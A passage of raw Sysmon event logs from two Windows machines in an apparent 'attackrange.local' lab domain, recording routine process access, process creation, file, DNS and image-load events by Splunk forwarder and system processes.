Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980809Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.381{69CF5F33-8D18-6151-0A7A-00000000FD01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980808Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.380{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5990F0C5884E6D7AE86212C9DC75FB7B,SHA256=ABF8D1BEFDD53F2A565DE9EC1E009C530F720E4193B85216FE894737D61C4EFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:26.233{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53885- 23542300x8000000000000000980807Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.177{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F1F35C3C5165B162AE490E3E4F01811,SHA256=1B0AF3FA7B89EFFB0AB066E9F51399C88A4CC24C14911FA1716264F5E29A586A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.895{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5EA1BF7E1F461DBA5091ED06F246E7B,SHA256=8CB02CF7F1F0EEF84FEF614F5014429BDD921671EACFB2F28E2EB14900D740F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980838Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.662{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFE55BF0F03A5BEED4F7DB64AC89FA0A,SHA256=D4DA94E7023CD1A45078DF53D4B876A28C38CBD281EBCDCD0D8F7BCED55FF6C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980837Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.662{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=926794F5C8B713F9EE41947C745F30C5,SHA256=6BDD8A957CF09D5D5504EBF34825AABBBA33192F902B490A589AC749E1F34D72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D19-6151-7D00-00000000FD01}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D19-6151-7D00-00000000FD01}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D19-6151-7D00-00000000FD01}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.848{5EBD8912-8D19-6151-7D00-00000000FD01}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000001054955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.613{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x8000000000000000980836Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.287{69CF5F33-8D19-6151-0B7A-00000000FD01}8203716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980835Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D19-6151-0B7A-00000000FD01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980834Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980833Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980832Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980831Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980830Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980829Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980828Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 